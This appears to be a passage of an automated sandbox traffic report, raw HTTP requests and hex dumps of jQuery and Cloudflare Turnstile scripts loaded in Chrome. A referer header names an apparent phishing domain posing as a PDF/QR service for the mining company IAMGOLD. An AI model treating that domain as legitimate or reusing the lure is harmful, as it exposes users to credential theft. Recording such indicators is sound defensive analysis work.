                                                                                                                                                2024-10-28 16:47:58 UTC16384INData Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65
                                                                                                                                                Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
                                                                                                                                                2024-10-28 16:47:58 UTC16384INData Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d
                                                                                                                                                Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
                                                                                                                                                2024-10-28 16:47:58 UTC7581INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52
                                                                                                                                                Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain||e["X-Requested-With"]||(e["X-R


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                37192.168.2.1649767104.18.95.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-28 16:47:58 UTC383OUTGET /turnstile/v0/b/e1a56f38220d/api.js HTTP/1.1
                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                Connection: keep-alive
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                Accept: */*
                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                2024-10-28 16:47:58 UTC471INHTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 28 Oct 2024 16:47:58 GMT
                                                                                                                                                Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                Content-Length: 47672
                                                                                                                                                Connection: close
                                                                                                                                                accept-ranges: bytes
                                                                                                                                                last-modified: Wed, 23 Oct 2024 21:21:17 GMT
                                                                                                                                                cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8d9c692758b90bcf-DFW
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                2024-10-28 16:47:58 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 6c 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 6c 5d 28 67 29 2c 75 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 66 29 7b 6e 28 66 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 75 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 75 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                                                                                                Data Ascii: "use strict";(function(){function Ht(e,r,n,o,c,l,g){try{var h=e[l](g),u=h.value}catch(f){n(f);return}h.done?r(u):Promise.resolve(u).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var l=e.apply(r,n);funct
                                                                                                                                                2024-10-28 16:47:58 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 53 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                                                                                                Data Ascii: e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                                                                                                                2024-10-28 16:47:58 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 6a 74 28 65 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 47 74 28 65 2c 72 29 7c 7c 7a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 44 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6c 5b 30
                                                                                                                                                Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return jt(e)||qt(e,r)||Gt(e,r)||zt()}function D(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(l[0
                                                                                                                                                2024-10-28 16:47:58 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 59 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 71 3b 28 66 75
                                                                                                                                                Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Yt=300020;var De=300030;var Ve=300031;var q;(fu
                                                                                                                                                2024-10-28 16:47:58 UTC1369INData Raw: 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 24 7c 7c 28 24 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20
                                                                                                                                                Data Ascii: .NEVER="never",e.MANUAL="manual",e.AUTO="auto"})($||($={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var
                                                                                                                                                2024-10-28 16:47:58 UTC1369INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 6c 77 61 79 73 22 2c 22 65 78 65 63 75 74 65 22 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 51 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 74 72 75 65 22 2c 22 66 61 6c 73 65 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 72 65 6e 64 65 72 22 2c 22 65 78 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 24 74 3d 33 30 30 2c 4a 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 68 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28
                                                                                                                                                Data Ascii: }function gt(e){return M(["always","execute","interaction-only"],e)}function Qt(e){return M(["true","false"],e)}function yt(e){return M(["render","execute"],e)}var $t=300,Jt=10;function ht(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(
                                                                                                                                                2024-10-28 16:47:58 UTC1369INData Raw: 29 2e 63 6f 6e 63 61 74 28 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 72 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 45 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 73 69 7a 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 6c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 66 29 7d 76 61 72 20 52 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 2c 6e 2c 6f 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 6c 2c 67 3d 4d 28 6b 72 2c 28 6c 3d 28 72 3d 65 2e 64
                                                                                                                                                Data Ascii: ).concat(e,"/").concat(r,"/").concat(n.theme,"/").concat(E,"/").concat(n.size,"/").concat(n.language,"/").concat(f)}var Rt=function(e){var r,n,o=window.innerWidth<400,c=e.state===Se.FAILURE_FEEDBACK||e.state===Se.FAILURE_HAVING_TROUBLES,l,g=M(kr,(l=(r=e.d
                                                                                                                                                2024-10-28 16:47:58 UTC1369INData Raw: 73 68 61 6d 29 72 65 74 75 72 6e 21 31 3b 69 66 28 74 79 70 65 6f 66 20 50 72 6f 78 79 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 30 3b 74 72 79 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 4f 66 2e 63 61 6c 6c 28 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 42 6f 6f 6c 65 61 6e 2c 5b 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 49 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 49 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 6c 2c 67 29 7b 76 61 72 20 68 3d 5b 6e 75 6c 6c 5d 3b 68 2e 70 75 73 68 2e 61 70 70 6c 79
                                                                                                                                                Data Ascii: sham)return!1;if(typeof Proxy=="function")return!0;try{return Boolean.prototype.valueOf.call(Reflect.construct(Boolean,[],function(){})),!0}catch(e){return!1}}function Ie(e,r,n){return je()?Ie=Reflect.construct:Ie=function(c,l,g){var h=[null];h.push.apply
                                                                                                                                                2024-10-28 16:47:58 UTC1369INData Raw: 63 61 6c 6c 28 74 68 69 73 2c 6f 29 2c 4d 65 28 42 65 28 6c 29 2c 22 63 6f 64 65 22 2c 76 6f 69 64 20 30 29 2c 6c 2e 6e 61 6d 65 3d 22 54 75 72 6e 73 74 69 6c 65 45 72 72 6f 72 22 2c 6c 2e 63 6f 64 65 3d 63 2c 6c 7d 72 65 74 75 72 6e 20 6e 7d 28 71 65 28 45 72 72 6f 72 29 29 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 72 29 7b 76 61 72 20 6e 3d 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2e 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 64 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 65 28 65 29 7b 72 65 74
                                                                                                                                                Data Ascii: call(this,o),Me(Be(l),"code",void 0),l.name="TurnstileError",l.code=c,l}return n}(qe(Error));function m(e,r){var n="[Cloudflare Turnstile] ".concat(e,".");throw new dr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function ze(e){ret
                                                                                                                                                2024-10-28 16:47:58 UTC1369INData Raw: 64 69 76 22 29 3b 75 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 66 69 78 65 64 22 2c 75 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 36 22 2c 75 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 75 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 2c 75 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 22 2c 75 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 22 2c 75 2e 73 74 79 6c 65 2e 74 72 61 6e 73 66 6f 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 75 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 75 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 75 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30
                                                                                                                                                Data Ascii: div");u.style.position="fixed",u.style.zIndex="2147483646",u.style.width="100vw",u.style.height="100vh",u.style.top="0",u.style.left="0",u.style.transformOrigin="center center",u.style.overflowX="hidden",u.style.overflowY="auto",u.style.background="rgba(0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                38192.168.2.1649768104.18.94.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-28 16:47:58 UTC819OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/inwdh/0x4AAAAAAAjGd7wY-0w5WfUZ/auto/fbE/normal/auto/ HTTP/1.1
                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                Connection: keep-alive
                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                                                Sec-Fetch-Dest: iframe
                                                                                                                                                Referer: https://vokbz-iamgold.mobile-pdfqronline.com/
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                2024-10-28 16:47:58 UTC1362INHTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 28 Oct 2024 16:47:58 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Content-Length: 26467
                                                                                                                                                Connection: close
                                                                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                                                                                                                cross-origin-embedder-policy: require-corp
                                                                                                                                                cross-origin-opener-policy: same-origin
                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                referrer-policy: same-origin
                                                                                                                                                document-policy: js-profiling
                                                                                                                                                2024-10-28 16:47:58 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 64 39 63 36 39 32 37 38 64 66 32 32 65 32 37 2d 44 46 57 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: Server: cloudflareCF-RAY: 8d9c69278df22e27-DFWalt-svc: h3=":443"; ma=86400
                                                                                                                                                2024-10-28 16:47:58 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                                                                                                Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                                                                                                2024-10-28 16:47:58 UTC1369INData Raw: 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65 64
                                                                                                                                                Data Ascii: ding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiased
